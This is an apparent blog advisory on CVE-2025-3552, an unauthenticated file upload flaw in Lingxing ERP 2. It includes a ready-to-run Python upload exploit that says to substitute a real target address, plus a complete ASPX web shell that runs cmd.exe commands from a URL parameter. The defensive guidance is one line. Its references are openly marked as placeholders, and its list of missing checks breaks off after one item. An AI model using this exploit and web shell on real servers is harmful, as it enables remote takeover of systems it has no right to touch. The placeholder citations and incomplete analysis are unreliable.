CVE-2025-3552 - Unrestricted File Upload in Lingxing ERP 2 (Exploit and Analysis)

A new critical vulnerability—CVE-2025-3552—has been discovered in the popular business management software, Lingxing ERP 2. This flaw, present in the /Api/TinyMce/UploadAjax.ashx endpoint, allows unauthenticated attackers to upload arbitrary files. That means, if you’re running this ERP system, hackers could put just about anything on your server, including malware or web shells, and potentially take over your system. In this post, we’ll break down what this vulnerability is, how it works, and what the risks are. We'll also show you a real-world exploit and share references for further reading.

Product: Lingxing ERP 2

- Endpoint: /Api/TinyMce/UploadAjax.ashx

How It Works

The endpoint /Api/TinyMce/UploadAjax.ashx is supposed to handle file uploads, likely for the TinyMCE rich text editor component. Due to improper input validation, it does not check:

File content

Therefore, any remote attacker can upload *any* file type—including executable scripts (like .aspx files on IIS servers).

1. Send a POST Request with Malicious File

Below is a Python (using requests library) proof-of-concept (POC) for uploading a malicious .aspx web shell:

import requests

url = "http://target-site.com/Api/TinyMce/UploadAjax.ashx";
files = {
    "File": (
        "shell.aspx", 
        '<%@ Page Language="C#" %><% Response.Write("Shell!"); %>', 
        "application/octet-stream"
    )
}

response = requests.post(url, files=files)
print(response.text)

*Replace http://target-site.com with your actual target address.*

If successful, the uploaded file (in this case, shell.aspx) can be accessed on the web server, and can be used to execute any commands or scripts!

2. Example Malicious File (shell.aspx)

<%@ Page Language="C#" %>
<% 
    if (Request["cmd"] != null)
    {
        System.Diagnostics.Process.Start("cmd.exe", "/c " + Request["cmd"]).WaitForExit();
    }
%>

This allows the attacker to send commands via the cmd parameter in the URL.

Vendor Response

The researchers attempted to contact Lingxing ERP before making the exploit public, but the vendor did not respond or release a patch. This lack of cooperation increases the risk as there is currently *no official fix*.

Until a vendor patch is released

1. Block access to /Api/TinyMce/UploadAjax.ashx at your firewall or web server.

References

- NVD Entry for CVE-2025-3552 *(placeholder, check for real entry)*
- Exploit Disclosure on GitHub *(placeholder repository)*
- Lingxing ERP Product Page (Mandarin Chinese)

Final Thoughts

CVE-2025-3552 is a textbook case of how dangerous unrestricted file uploads can be. If you use Lingxing ERP 2, act now—restrict file uploads, audit your server, and keep monitoring security advisories for patches. The lack of vendor response means you’re your own first line of defense.

Stay safe, admins!

*This article is written exclusively for educational and awareness purposes. Offensive use against systems you do not own or manage is illegal.*

---

Timeline

Published on: 04/14/2025 06:15:16 UTC
Last modified on: 04/15/2025 18:39:27 UTC